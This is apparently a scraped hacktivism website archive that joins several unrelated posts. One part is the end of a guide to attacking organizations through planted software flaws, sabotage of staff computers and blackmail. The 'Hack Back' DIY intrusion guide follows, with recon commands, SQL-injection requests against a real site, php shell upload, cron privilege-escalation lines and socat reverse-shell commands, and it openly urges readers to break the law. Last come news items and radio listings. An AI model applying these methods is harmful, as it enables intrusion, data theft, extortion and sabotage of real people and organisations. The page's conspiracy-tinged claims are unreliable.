within the target organization are accused of trying to siphon out its secrets,
it will be forced to suspend a large portion of its operations while an
investigation is done.

(6) Use a DDoS attack to disrupt the target organization’s communications for a
short period of time when they are most in need of it. For a corporation, this
could be during an important international Skype call. For a government, this
could be immediately following a devastating attack from an insurgency group.
Doing this will cause panic, which will make the target organization
temporarily more susceptible to other kinds of attacks.

(7) Pose as a legitimate company selling legitimate software and befriend the
target organization. Create a piece of software with a very hard to detect
security flaw in it and sell it to them. The flaw could be as simple as a
poorly implemented encryption library or as complex as an insecure multistage
parsing algorithm. It must be incredibly subtle. So subtle that if it is
detected you will be able to write it off as unintentional. It should be
plausibly deniable. Once the target organization installs the vulnerable
software on their machines, leverage it to perform targeted attacks on key
individuals within it. Do not use it to infect entire subnets, as that will
draw to much attention.

(8) Locate a small software provider your target organization already does
business with and infiltrate their network by using other stratagems. Modify
their source code slightly so that their software becomes vulnerable to remote
attack. Do not modify just any code you come across, study the software
provider’s development process and target code that has already been checked
for bugs and is days away from being released to customers. When the target
organization installs the latest version of software from the company that you
have infiltrated, they will become vulnerable. Leverage this vulnerability to
perform targeted attacks on key individuals within the target organization. Do
not use it to infect entire subnets, as that will draw to much attention.

(9) Locate a small software provider your target organization already does
business with and infiltrate their network by using other stratagems. Most
software companies offer rewards to security researchers who find
vulnerabilities in their products. Determine how reported vulnerabilities are
managed by the company you have infiltrated and devise a way to monitor them
in real time. As soon as a security researcher reports a major vulnerability
in a product your target organization uses, use it to perform targeted attacks
on key individuals within it. Do not use it to infect entire subnets, as that
will draw to much attention.

(10) Using other stratagems, infiltrate the computers of a number of influential
individuals within the target organization. Monitor their activity constantly
and closely. If possible, listen to them through their computer’s microphone.
When you believe that one of them has left their computer, undo things they
have just done. Delete the last sentence they wrote. Hit the back button on
their web browser. Close the program they just opened. Over time, this will
lead them to question their sanity.

(11) Using other stratagems, infiltrate the computers of a number of influential
individuals within the target organization. Most modern governments and
corporations are at least partially corrupt. Find evidence of this corruption
and use it to compel one or more of these influential individuals to aid your
cause. If you are unable to find any evidence of corruption, do not be afraid
to bluff. If you make a mysterious window pop up on, say, a CFO’s computer that
alludes to some sort of dirty secret, it is very possible that the CFO will
assume that the hacker who caused the widow to appear knows something about
them that they actually do not. A lot of powerful people have skeletons in the
closet. The media has instilled a fear of hackers into the general populace,
and this fear can be used to your advantage. Most normal people, upon being
confronted by a hacker that has gained complete control of their computer, will
be inclined to believe plausible sounding white lies. Having an “inside man”
within your target organization can be extremely useful.

Interlocking Stratagems in Practice

In this section I shell present an example of a plausible situation that could
warrant the involvement of hacktivists and a corresponding attack loosely built
upon the stratagems from the last section. I have tried to make the situation
realistic, but it is very likely that if you use my writing to plan and execute
your own attack it will play out nothing like the attack depicted below. Most
actual attacks are far more complex than the one presented here. The purpose
of this example is to demonstrate the way in which multiple strike teams should
work together. Notice how at all times each team has one or more specific
goals.

Situation: A hacktivist collective has decided to attack the terrorist
organization Bina Al-ar-mal after they captured and executed a tourist in
Syria. Bina Al-ar-mal is believed to consist of over 40,000 people, has
hundreds of public Twitter feeds and Facebook accounts, and runs a small
terrorist news site hosted on a Russian server. It has three known leaders, who
we shall refer to as Head Terrorist 1, Head Terrorist 2, and Head Terrorist 3.
Twenty-seven hacktivists have joined the effort. They have been split into
three teams: team 1 consists of five of the most highly skilled hacktivists,
team 2 consists of seven moderately skilled hacktivists, and team 3 consists of
fifteen amateur hacktivists.

Time Line:

(Day 1, Hour 1) Team 1 is initially tasked by the collective with infiltrating
as many terrorist Twitter and Facebook accounts as possible. The team starts
enumerating the accounts immediately. They decide that no drill will be
executed, as breaking into Facebook and Twitter accounts is a trivial task.

(Day 1, Hour 1) Team 2 is initially tasked by the collective with infiltrating
the web hosting provider hosting the terrorist group’s website. They begin
reconnaissance.

(Day 1, Hour 1) Team 3 is initially tasked by the collective with attacking
Bina Al-ar-mal’s website directly. They begin to map the website.

(Day 1, Hour 2) Team 1 finishes enumerating the terrorist Facebook and Twitter
accounts. They begin attempting to break into them.

(Day 1, Hour 2) Team 3 finishes mapping Bina Al-ar-mal’s website and begins to
attack.

(Day 1, Hour 3) Team 1 has breached a few terrorist Facebook and Twitter
accounts. After examining their contents they determine that the terrorists
are using SpookyMail email service to communicate off of social media. A few
terrorist email accounts are identified and the team begins to try to break
into those as well.

(Day 1, Hour 3) Team 3 gains read/write access to a limited portion of the
server Bina Al-ar-mal’s website is hosted on. The other teams are alerted.
They set up a simple php based IP logger script to capture the IP addresses of
Bina Al-ar-mal members attempting to check their organization’s news feed.

(Day 1, Hour 6) Team 2’s reconnaissance ends. They have located the web hosting
provider and gathered information on said provider’s website and servers. They
begin attacking them.

(Day 1, Hour 7) Team 1 breaches their first few terrorist email accounts.

(Day 1, Hour 9) Team 2 locates a vulnerability in the the terrorist’s web
hosting provider’s website. They are not able to fully compromise any of their
servers, but they are able to get a list of customer names, domain names, and
billing addresses by exploiting a flaw in the website’s shopping cart feature.
Upon inspecting the list, they discover that the person paying Bina Al-ar-mal’s
hosting bill has a British billing address. The other teams are alerted and
Scotland Yard is notified of the terrorist threat immediately.

(Day 1, Hour 23) Team 1 is able to get Head Terrorist 1’s email address off of
the “contact” pane of one of the hacked terrorist email accounts. They make
ready for a spear phishing attack against him, but decide to wait some time to
launch it, as it is currently the middle of the night where Head Terrorist 1 is
believed to be.

(Day 2, Hour 3) Team 3 has gathered over seven thousand IP addresses of people
viewing Bina Al-ar-mal’s news feed and tries to attack them all using known
router vulnerabilities. When all is said and done they have infected
thirty-seven routers and forty-six workstations. They determine that
thirty-four of these work stations belong to active members of Bina Al-ar-mal.
They observe these workstations passively, hoping to gather information. The
other two teams are briefed on their success.

(Day 2, Hour 8) Team 1 launched a spear phishing attack against Head Terrorist
1 using the hacked email account of another terrorist.

(Day 2, Hour 9) Team 1’s spear phishing attack against Head Terrorist 1 is a
success. They now have full control over his Windows XP laptop and inform the
other two teams of their success. After searching the laptop’s hard drive and
downloading a half gigabyte of confidential documents and IM logs, the team
decides to plant a PDF of the Christian Bible on it along with some real
looking fake papers from the CIA. After gleaning Head Terrorist 2’s and Head
Terrorist 3’s email addresses from the stolen IM logs, the team sends them both
emails from the hacked email account of a lower level terrorist claiming that
Head Terrorist 1 is dirty.

(Day 2, Hour 9) Team 3 decides to take the sensitive information stolen from
Head Terrorist 1’s computer stolen by Team 1 along with other fake CIA
documents and place it on all thirty-four of the terrorist workstations they
control. They use a hacked email account belonging to an uninvolved terrorist
to inform Head Terrorist 2 and Head Terrorist 3 that Head Terrorist 1 is a
traitor an he has at least thirty-four moles inside of their organization, all
of whom they mention by name.

(Day 2, Hour 10) Head Terrorist 1’s laptop is searched by security forces under
the control of Terrorist 2. Head Terrorist 1 is determined to be part of the
CIA and is placed into a cell to be used as leverage against the United States.

(Day 2, Hour 17) Head Terrorist 2 and Head Terrorist 3 raid all thirty-four of
the suspected moles and find the planted documents. They begin to interrogate
all thirty-four of them in order to find out how deep the CIA has penetrated
their organization. None of them know anything but most of them make up real
sounding false information to make the interrogations end.

(Day 3, Hour 3) Team 1 determines that most remaining Facebook and Twitter
accounts can not be breached. Several team members leave and a few stick around
to try and finish off the remaining accounts.

(Day 6, Hour 17) Scotland Yard arrests the person allegedly paying for Bina
Al-ar-mal’s web hosting. It is later determined that the person is actually
part of a London-based Bina Al-ar-mal cell.

(Day 6, hour 20) Team 2 destroys Bina Al-ar-mal’s web site after catching word
of the Scotland Yard raid.

End Result: One of three head terrorists is being held by their own
organization as a traitor and thirty-four unrelated terrorists are being held
by their own organization and brutally interrogated about actions they did not
commit. One terrorist is in the custody of the Scotland Yard, and a British
terror cell has been exposed. Bina Al-ar-mal’s entire communication network is
compromised (but they do not know that yet), and their website has been taken
offline permanently. All members of Bina Al-ar-mal are now becoming
increasingly suspicious of their fellow members and the hacktivist collective
is now in a position to launch further attacks on Bina Al-ar-mal (using the
compromised email and social media accounts) at a later time. This has all been
accomplished in under a week.

________________________________________________________________________________

My public key is available here:

http://pastebin.com/VhW0bmAt
https://paste.ee/p/C5M3U
http://tny.cz/c9b82da0
http://hastebin.com/jikebijifu.hs
http://chopapp.com/#w04dkx06

SHA1: cb36db996bb684e569663ca7b0d93177ecc561be

Grab it while you still can.

________________________________________________________________________________
Disclaimer: All information provided in this document is for educational
purposes only. The ideas presented here are solely academic and should never be
acted upon or put into practice. The author of this document will not be held
responsible in the event any criminal or civil charges be brought against any
individuals misusing the information in this document to break the law.

—–BEGIN PGP SIGNATURE—–

iQIcBAEBCgAGBQJUWbobAAoJEDWMWw6MLtALcMgP/3FVybGLvoK2rigce8BoxlVx
I06UKO0jh8iUpWxSKFC1mI9phCed8Dhx1nb9bwuY6CWa5NPnn8+R8O98wyvzW5aX
4UVytZ8aqxn83RocLGjkRF6TaCBFaD3V81IHaNY1ODuXBGVR7IG4djS6pDw9BJda
f19L3a8zdr8yoczisdpckIWEqWfLSRgwkOcJ9xtDYG6FuDjs++4ZdncUfwCg76aw
xYJVACdXsI1VDjVtGr1Fx756DuPkFr5APQG64dor5iOxhXw+9sEVD7AnzjpSCxCK
MtaHzkuiwwnp38z9PlaSPqxwyNZ6t8F9FPsgf76x7+egqZ0/Q158NR7gGb1XqaL9
V6mopDiGeQveHePG1zpOv22YBMkrxi0KjFDDTOM/xYBw/+wZnjXjoL+eC2vegQxU
cvcntSXN8l5Wtjc+mX9GdKF+RmjQvN62TmpxB9i35ZhdR7ogk1uqPGqxbova6v/f
3VSfroFWoOo2wkx/aZLpo3Sqe6JS+lRBpZkysWsJHcbNjUfYG6BDWameXvBuIecB
Q1kdRhrQKayoaVOVrzLTmm4T+Nu9/0Vcdx9AO5FF4eShHNa93ybDVOcUaweYoO/K
CngW+eRkz2B+YOOTOeAq9JfvAlo89HUWCRj+OOvWsjJAy5eEQWYcH2X7b7CyGkZb
U4SaSVZVhGFN1kQgCIlV
=QuZa
—–END PGP SIGNATURE—–

Hack Back: A DIY Guide for Those Without the Patience to Wait for Whistleblowers

Aug 15, 2014 | 2020 Relevant, Black Technology, Leaks

–[ 1 ]– Introduction

I’m not writing this to brag about what an 31337 h4x0r I am and what m4d sk1llz
it took to 0wn Gamma. I’m writing this to demystify hacking, to show how simple
it is, and to hopefully inform and inspire you to go out and hack shit. If you
have no experience with programming or hacking, some of the text below might
look like a foreign language. Check the resources section at the end to help you
get started. And trust me, once you’ve learned the basics you’ll realize this
really is easier than filing a FOIA request.

–[ 2 ]– Staying Safe

This is illegal, so you’ll need to take same basic precautions:

1) Make a hidden encrypted volume with Truecrypt 7.1a [0]
2) Inside the encrypted volume install Whonix [1]
3) (Optional) While just having everything go over Tor thanks to Whonix is
probably sufficient, it’s better to not use an internet connection connected
to your name or address. A cantenna, aircrack, and reaver can come in handy
here.

[0] https://truecrypt.ch/downloads/
[1] https://www.whonix.org/wiki/Download#Install_Whonix

As long as you follow common sense like never do anything hacking related
outside of Whonix, never do any of your normal computer usage inside Whonix,
never mention any information about your real life when talking with other
hackers, and never brag about your illegal hacking exploits to friends in real
life, then you can pretty much do whatever you want with no fear of being v&.

NOTE: I do NOT recommend actually hacking directly over Tor. While Tor is usable
for some things like web browsing, when it comes to using hacking tools like
nmap, sqlmap, and nikto that are making thousands of requests, they will run
very slowly over Tor. Not to mention that you’ll want a public IP address to
receive connect back shells. I recommend using servers you’ve hacked or a VPS
paid with bitcoin to hack from. That way only the low bandwidth text interface
between you and the server is over Tor. All the commands you’re running will
have a nice fast connection to your target.

–[ 3 ]– Mapping out the target

Basically I just repeatedly use fierce [0], whois lookups on IP addresses and
domain names, and reverse whois lookups to find all IP address space and domain
names associated with an organization.

[0] http://ha.ckers.org/fierce/

For an example let’s take Blackwater. We start out knowing their homepage is at
academi.com. Running fierce.pl -dns academi.com we find the subdomains:
67.238.84.228 email.academi.com
67.238.84.242 extranet.academi.com
67.238.84.240 mail.academi.com
67.238.84.230 secure.academi.com
67.238.84.227 vault.academi.com
54.243.51.249 www.academi.com

Now we do whois lookups and find the homepage of www.academi.com is hosted on
Amazon Web Service, while the other IPs are in the range:
NetRange: 67.238.84.224 – 67.238.84.255
CIDR: 67.238.84.224/27
CustName: Blackwater USA
Address: 850 Puddin Ridge Rd

Doing a whois lookup on academi.com reveals it’s also registered to the same
address, so we’ll use that as a string to search with for the reverse whois
lookups. As far as I know all the actual reverse whois lookup services cost
money, so I just cheat with google:
“850 Puddin Ridge Rd” inurl:ip-address-lookup
“850 Puddin Ridge Rd” inurl:domaintools

Now run fierce.pl -range on the IP ranges you find to lookup dns names, and
fierce.pl -dns on the domain names to find subdomains and IP addresses. Do more
whois lookups and repeat the process until you’ve found everything.

Also just google the organization and browse around its websites. For example on
academi.com we find links to a careers portal, an online store, and an employee
resources page, so now we have some more:
54.236.143.203 careers.academi.com
67.132.195.12 academiproshop.com
67.238.84.236 te.academi.com
67.238.84.238 property.academi.com
67.238.84.241 teams.academi.com

If you repeat the whois lookups and such you’ll find academiproshop.com seems to
not be hosted or maintained by Blackwater, so scratch that off the list of
interesting IPs/domains.

In the case of FinFisher what led me to the vulnerable finsupport.finfisher.com
was simply a whois lookup of finfisher.com which found it registered to the name
“FinFisher GmbH”. Googling for:
“FinFisher GmbH” inurl:domaintools
finds gamma-international.de, which redirects to finsupport.finfisher.com

…so now you’ve got some idea how I map out a target.
This is actually one of the most important parts, as the larger the attack
surface that you are able to map out, the easier it will be to find a hole
somewhere in it.

–[ 4 ]– Scanning & Exploiting

Scan all the IP ranges you found with nmap to find all services running. Aside
from a standard port scan, scanning for SNMP is underrated.

Now for each service you find running:

1) Is it exposing something it shouldn’t? Sometimes companies will have services
running that require no authentication and just assume it’s safe because the url
or IP to access it isn’t public. Maybe fierce found a git subdomain and you can
go to git.companyname.come/gitweb/ and browse their source code.

2) Is it horribly misconfigured? Maybe they have an ftp server that allows
anonymous read or write access to an important directory. Maybe they have a
database server with a blank admin password (lol stratfor). Maybe their embedded
devices (VOIP boxes, IP Cameras, routers etc) are using the manufacturer’s
default password.

3) Is it running an old version of software vulnerable to a public exploit?

Webservers deserve their own category. For any webservers, including ones nmap
will often find running on nonstandard ports, I usually:

1) Browse them. Especially on subdomains that fierce finds which aren’t intended
for public viewing like test.company.com or dev.company.com you’ll often find
interesting stuff just by looking at them.

2) Run nikto [0]. This will check for things like webserver/.svn/,
webserver/backup/, webserver/phpinfo.php, and a few thousand other common
mistakes and misconfigurations.

3) Identify what software is being used on the website. WhatWeb is useful [1]

4) Depending on what software the website is running, use more specific tools
like wpscan [2], CMS-Explorer [3], and Joomscan [4].

First try that against all services to see if any have a misconfiguration,
publicly known vulnerability, or other easy way in. If not, it’s time to move
on to finding a new vulnerability:

5) Custom coded web apps are more fertile ground for bugs than large widely used
projects, so try those first. I use ZAP [5], and some combination of its
automated tests along with manually poking around with the help of its
intercepting proxy.

6) For the non-custom software they’re running, get a copy to look at. If it’s
free software you can just download it. If it’s proprietary you can usually
pirate it. If it’s proprietary and obscure enough that you can’t pirate it you
can buy it (lame) or find other sites running the same software using google,
find one that’s easier to hack, and get a copy from them.

[0] http://www.cirt.net/nikto2
[1] http://www.morningstarsecurity.com/research/whatweb
[2] http://wpscan.org/
[3] https://code.google.com/p/cms-explorer/
[4] http://sourceforge.net/projects/joomscan/
[5] https://code.google.com/p/zaproxy/

For finsupport.finfisher.com the process was:

* Start nikto running in the background.

* Visit the website. See nothing but a login page. Quickly check for sqli in the
login form.

* See if WhatWeb knows anything about what software the site is running.

* WhatWeb doesn’t recognize it, so the next question I want answered is if this
is a custom website by Gamma, or if there are other websites using the same
software.

* I view the page source to find a URL I can search on (index.php isn’t
exactly unique to this software). I pick Scripts/scripts.js.php, and google:
allinurl:”Scripts/scripts.js.php”

* I find there’s a handful of other sites using the same software, all coded by
the same small webdesign firm. It looks like each site is custom coded but
they share a lot of code. So I hack a couple of them to get a collection of
code written by the webdesign firm.

At this point I can see the news stories that journalists will write to drum
up views: “In a sophisticated, multi-step attack, hackers first compromised a
web design firm in order to acquire confidential data that would aid them in
attacking Gamma Group…”

But it’s really quite easy, done almost on autopilot once you get the hang of
it. It took all of a couple minutes to:

* google allinurl:”Scripts/scripts.js.php” and find the other sites

* Notice they’re all sql injectable in the first url parameter I try.

* Realize they’re running Apache ModSecurity so I need to use sqlmap [0] with
the option –tamper=’tamper/modsecurityversioned.py’

* Acquire the admin login information, login and upload a php shell [1] (the
check for allowable file extensions was done client side in javascript), and
download the website’s source code.

[0] http://sqlmap.org/
[1] https://epinna.github.io/Weevely/

Looking through the source code they might as well have named it Damn Vulnerable
Web App v2 [0]. It’s got sqli, LFI, file upload checks done client side in
javascript, and if you’re unauthenticated the admin page just sends you back to
the login page with a Location header, but you can have your intercepting proxy
filter the Location header out and access it just fine.

[0] http://www.dvwa.co.uk/

Heading back over to the finsupport site, the admin /BackOffice/ page returns
403 Forbidden, and I’m having some issues with the LFI, so I switch to using the
sqli (it’s nice to have a dozen options to choose from). The other sites by the
web designer all had an injectable print.php, so some quick requests to:
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
reveal that finsupport also has print.php and it is injectable. And it’s
database admin! For MySQL this means you can read and write files. It turns out
the site has magicquotes enabled, so I can’t use INTO OUTFILE to write files.
But I can use a short script that uses sqlmap –file-read to get the php source
for a URL, and a normal web request to get the HTML, and then finds files
included or required in the php source, and finds php files linked in the HTML,
to recursively download the source to the whole site.

Looking through the source, I see customers can attach a file to their support
tickets, and there’s no check on the file extension. So I pick a username and
password out of the customer database, create a support request with a php shell
attached, and I’m in!

–[ 5 ]– (fail at) Escalating

___________
< got r00t? >
———–
\ ^__^
\ (oo)\_______
(__)\ )\/\
||—-w |
|| ||
^^^^^^^^^^^^^^^^

Root over 50% of linux servers you encounter in the wild with two easy scripts,
Linux_Exploit_Suggester [0], and unix-privesc-check [1].

[0] https://github.com/PenturaLabs/Linux_Exploit_Suggester
[1] https://code.google.com/p/unix-privesc-check/

finsupport was running the latest version of Debian with no local root exploits,
but unix-privesc-check returned:
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user
www-data can write to /etc/cron.hourly/mgmtlicensestatus
WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data
can write to /etc/cron.hourly/webalizer

so I add to /etc/cron.hourly/webalizer:
chown root:root /path/to/my_setuid_shell
chmod 04755 /path/to/my_setuid_shell

wait an hour, and ….nothing. Turns out that while the cron process is running
it doesn’t seem to be actually running cron jobs. Looking in the webalizer
directory shows it didn’t update stats the previous month. Apparently after
updating the timezone cron will sometimes run at the wrong time or sometimes not
run at all and you need to restart cron after changing the timezone. ls -l
/etc/localtime shows the timezone got updated June 6, the same time webalizer
stopped recording stats, so that’s probably the issue. At any rate, the only
thing this server does is host the website, so I already have access to
everything interesting on it. Root wouldn’t get much of anything new, so I move
on to the rest of the network.

–[ 6 ]– Pivoting

The next step is to look around the local network of the box you hacked. This
is pretty much the same as the first Scanning & Exploiting step, except that
from behind the firewall many more interesting services will be exposed. A
tarball containing a statically linked copy of nmap and all its scripts that you
can upload and run on any box is very useful for this. The various nfs-* and
especially smb-* scripts nmap has will be extremely useful.

The only interesting thing I could get on finsupport’s local network was another
webserver serving up a folder called ‘qateam’ containing their mobile malware.

–[ 7 ]– Have Fun

Once you’re in their networks, the real fun starts. Just use your imagination.
While I titled this a guide for wannabe whistleblowers, there’s no reason to
limit yourself to leaking documents. My original plan was to:
1) Hack Gamma and obtain a copy of the FinSpy server software
2) Find vulnerabilities in FinSpy server.
3) Scan the internet for, and hack, all FinSpy C&C servers.
4) Identify the groups running them.
5) Use the C&C server to upload and run a program on all targets telling them
who was spying on them.
6) Use the C&C server to uninstall FinFisher on all targets.
7) Join the former C&C servers into a botnet to DDoS Gamma Group.

It was only after failing to fully hack Gamma and ending up with some
interesting documents but no copy of the FinSpy server software that I had to
make due with the far less lulzy backup plan of leaking their stuff while
mocking them on twitter.
Point your GPUs at FinSpy-PC+Mobile-2012-07-12-Final.zip and crack the password
already so I can move on to step 2!

–[ 8 ]– Other Methods

The general method I outlined above of scan, find vulnerabilities, and exploit
is just one way to hack, probably better suited to those with a background in
programming. There’s no one right way, and any method that works is as good as
any other. The other main ways that I’ll state without going into detail are:

1) Exploits in web browers, java, flash, or microsoft office, combined with
emailing employees with a convincing message to get them to open the link or
attachment, or hacking a web site frequented by the employees and adding the
browser/java/flash exploit to that.
This is the method used by most of the government hacking groups, but you don’t
need to be a government with millions to spend on 0day research or subscriptions
to FinSploit or VUPEN to pull it off. You can get a quality russian exploit kit
for a couple thousand, and rent access to one for much less. There’s also
metasploit browser autopwn, but you’ll probably have better luck with no
exploits and a fake flash updater prompt.

2) Taking advantage of the fact that people are nice, trusting, and helpful 95%
of the time.
The infosec industry invented a term to make this sound like some sort of
science: “Social Engineering”. This is probably the way to go if you don’t know
too much about computers, and it really is all it takes to be a successful
hacker [0].

[0] https://www.youtube.com/watch?v=DB6ywr9fngU

–[ 9 ]– Resources

Links:

* https://www.pentesterlab.com/exercises/
* http://overthewire.org/wargames/
* http://www.hackthissite.org/
* http://smashthestack.org/
* http://www.win.tue.nl/~aeb/linux/hh/hh.html
* http://www.phrack.com/
* http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot
* http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash
* https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/
* https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers
(all his other blog posts are great too)
* https://www.corelan.be/ (start at Exploit writing tutorial part 1)
* http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/
One trick it leaves out is that on most systems the apache access log is
readable only by root, but you can still include from /proc/self/fd/10 or
whatever fd apache opened it as. It would also be more useful if it mentioned
what versions of php the various tricks were fixed in.
* http://www.dest-unreach.org/socat/
Get usable reverse shells with a statically linked copy of socat to drop on
your target and:
target$ socat exec:’bash -li’,pty,stderr,setsid,sigint,sane tcp-listen:PORTNUM
host$ socat file:`tty`,raw,echo=0 tcp-connect:localhost:PORTNUM
It’s also useful for setting up weird pivots and all kinds of other stuff.

Books:

* The Web Application Hacker’s Handbook
* Hacking: The Art of Exploitation
* The Database Hacker’s Handbook
* The Art of Software Security Assessment
* A Bug Hunter’s Diary
* Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier
* TCP/IP Illustrated

Aside from the hacking specific stuff almost anything useful to a system
administrator for setting up and administering networks will also be useful for
exploring them. This includes familiarity with the windows command prompt and unix
shell, basic scripting skills, knowledge of ldap, kerberos, active directory,
networking, etc.

–[ 10 ]– Outro

You’ll notice some of this sounds exactly like what Gamma is doing. Hacking is a
tool. It’s not selling hacking tools that makes Gamma evil. It’s who their
customers are targeting and with what purpose that makes them evil. That’s not
to say that tools are inherently neutral. Hacking is an offensive tool. In the
same way that guerrilla warfare makes it harder to occupy a country, whenever
it’s cheaper to attack than to defend it’s harder to maintain illegitimate
authority and inequality. So I wrote this to try to make hacking easier and more
accessible. And I wanted to show that the Gamma Group hack really was nothing
fancy, just standard sqli, and that you do have the ability to go out and take
similar action.

Solidarity to everyone in Gaza, Israeli conscientious-objectors, Chelsea
Manning, Jeremy Hammond, Peter Sunde, anakata, and all other imprisoned
hackers, dissidents, and criminals!

DARPA Hackers Show How Cars Can Be Remotely Controlled

Oct 18, 2013 | Abuses of Power, Black Technology, News

Hackers Chris Valasek and Charlie Miller have demonstrated from the backseat of a Toyota Prius that all you need is a Macbook and a USB cable in order to hack into a computer-controlled car.

Valasek is the director of security intelligence for IOActive and Miller is a security engineer for Twitter.

These two security researchers showed that they can turn off the breaks, for example, even if the driver is at the helm.

Using a grant from the Defense Advanced Research Projects Agency (DARPA), Miller and Valasek have been researching computerized car vulnerabilities since 2012 and will be displaying their findings at DEF CON, a hacker’s conference in Las Vegas next month.

Miller asserted that they “had full control of braking” and that they “disengaged the brakes so if you were going slow and tried to press the brakes they wouldn’t work. We could turn the headlamps on and off, honk the horn. We had control of many aspects of the automobile.”

• Turn off power to the steering
• Have the onboard GPS give incorrect directions
• Change the numbers on the speedometer
• Force the car to change direction

Miller explained: “At the moment there are people who are in the know, there are nay-sayers who don’t believe it’s important, and there are others saying it’s common knowledge but right now there’s not much data out there. We would love for everyone to start having a discussion about this, and for manufacturers to listen and improve the security of cars.”

Using the vehicle’s electronic control unit (ECU) and the on-board diagnostics port (OBD), Miller and Valasek gained control over a 2010 Ford Escape and Toyota Prius.

ECUs are embedded systems that “controls one or more of the electrical system or subsystems in a motor vehicle.”

The OBD is the “vehicle’s self-diagnostic and reporting” apparatus that “gives the vehicle owner or repair technician access to the status of the various vehicle sub-systems.”

A representative from Toyota explained that the hacker would have to be in the car to manipulate its systems.

He said: “Altered control can only be made when the device is connected. After it is disconnected the car functions normally. We don’t consider that to be ‘hacking’ in the sense of creating unexpected behavior, because the device must be connected – ie the control system of the car physically altered. The presence of a laptop or other device connected to the OBD [on board diagnostics] II port would be apparent.”

Hacking into cars that are remotely controlled, such as Google’s self-driving vehicles, is a concern and this researcher could uncover implications for security purposes.

In 2010, teams from the University of Washington (UW) and the University of California (UC) were able to breach the computer systems of cars using cellular phone connections, Bluetooth headsets and a CD.

Stefan Savage from UC explained that their research “explores how hard it is to compromise a car’s computers without having any direct physical access to the car.”

Computerized cars “contain cellular connections and Bluetooth wireless technology” that could be tapped into remotely and used to take over the controls of the vehicle, listen into the conversations taking place in the cab of the car and completely compromise the safety of the vehicle.

Because computer connections to cars are virtually indistinguishable from internet-connected computers, their propensity toward vulnerabilities from outside influences are similar.

Using an On-Star navigation unit, a hacker could utilize the controls a remote technician at the GPS corporation’s on-call center because they are fully capable of controlling a vehicle in the event of an accident or call from a customer.

With complete disregard for driver privacy, the Obama administration gave their consent to the National Highway Traffic Safety Administration (NHTSA) to mandate black box event data recorders (EDR) be installed in all new cars in the US.

The NHTSA says that by September 2014 all car and light trucks will be equipped with EDRs that will silently “record the actions of drivers and the responses of their vehicles in a continuous information loop.”

The information recorded by EDRs includes:

• vehicle speed
• whether the brake was activated in the moments before a crash
• crash forces at the moment of impact
• information about the state of the engine throttle
• air bag deployment timing and air bag readiness prior to the crash
• whether the vehicle occupant’s seat belt was buckled

The NHTSA claims that “EDRs do not collect any personal identifying information or record conversations and do not run continuously.”

Advanced EDRs can collect detailed information about drivers and their driving habits; including the size and weight of the driver, the seat position, the habits of the driver as well as passengers.

The excuse is the EDRs gather information about car crashes in the moments leading up to the accident that manufacturers can use to improve their safety measures when constructing vehicles. However, the government regulation utilizes surveillance technology with policies that do not outline the expressed use of the data collected in the EDRs.

November 21, 2012 – DCMX Radio: Anonymous on Gaza & Israel War Crimes, AT&T iPad Conviction, Blackwater CEO’s New Biz, Random Headlines, Uruguay President Charity

Nov 21, 2012 | DCMX Radio, News

Anonymous statements on Gaza / Israel Conflict & Ceasefire

Security researcher Andrew Aurenheimer found guilty of conspiracy and identity fraud in ‘hackless’ AT&T iPad breach

Ex-navy SEAL & War Criminal Erik Prince sets trail for Chinese & International Investors into Africa

RANDOM QUICK HEADLINES

Uruguay President, Jose Mujica, Donates Most Of His Pay To Charity

Every Week Night 12-1am EST (9-10pm PST)

– Click Image to Listen LIVE –

Are Aliens Real? Hacker Gary McKinnon Says Evidence is in Military Computers, US Seeks Extradition

Oct 31, 2012 | Activism

Are aliens real? One hacker who broke into US Military computers says yes, claiming that he found evidence of extraterrestrial life in the computer networks he broke into. Now, the United States is seeking extradition for breaching both military and NASA computer networks. However, the UK says that he isn’t fit to stand trial and has blocked his extradition.

Gary McKinnon, 46, was a computer administrator previously. He hacked into military networks right after the September 11th, 2001 attacks. He says that he was looking for evidence of extraterrestrial life in those computers and that he found it. He claims he found both photographs of alien spacecraft and names of aliens who had flown them. If that is true, then the conspiracy theorists have been right all along. Aliens have landed on Earth and the United States Government is covering them up.

US Officials said that he caused almost a million dollars in damage and prosecutor Paul McNulty called it the ” biggest hack of military computers ever, at least ever detected.” UK Officials like Home Secretary Theresa May say that McKinnon suffers from depression and is at-risk of taking his own life. British Prime Minister David Cameron is also a supporter of McKinnon, even taking the case to President Barack Obama.

So, are aliens real? Is the government covering up extraterrestrials? This is perhaps not the most credible case that involves aliens, but depression does not necessarily mean mental incompetence, and apparently Gary McKinnon was competent enough to hack into one of the most secure computer networks in the world. One thing is certain. If the conspiracy theorists are right, Gary McKinnon should be receiving a visit from the Men in Black sometime in the near future.

via Gather

October 2, 2012 – DCMX Radio: NDAA Appeals Update, Patriot Act Crushing 1st Amendment, Hacking & ZeroDays, Banking Situation

Oct 3, 2012 | DCMX Radio, News

DCMX Sound Effects Update~ Tribute to K-Rino with ‘Grand Deception’

National Detention Authorization Act (NDAA) Appeals Court Update Discussion

Viruses, Hacking, Stuxnet & Flame – ZeroDay Exploits, Who is Building Them?

Patriot Act Being Used to Silence Activism & Protest!

Romney goon offers absurd recommendation for the Banking Industry

Further Discussion of the Conspiracy Matrix

Every Week Night 12-1am EST (9-10pm PST)

– Click Image to Listen LIVE –

Sell Out Hackers: The Zero-Day Exploit Market

Oct 3, 2012 | News

Exploit sellers arm governments and businesses, but are they harming security for everyone else?

Remember the final battle scene in Star Wars: A New Hope? Remember how Luke Skywalker slotted a bomb from his X-Wing down the Death Star’s exhaust port to blow the spherical space-station apart? Well that port is much like a zero-day vulnerability, and the rebel force’s attack was a carefully constructed zero-day exploit.

Despite the Force being so strong in him, Darth Vader managed to commission a ship with a glaring flaw in it. In the same way, developers often create, and proudly deliver, software covered in holes. When they are exploited, and attackers fire malware or some other nasty code through them, owners of that software can be blown apart too.

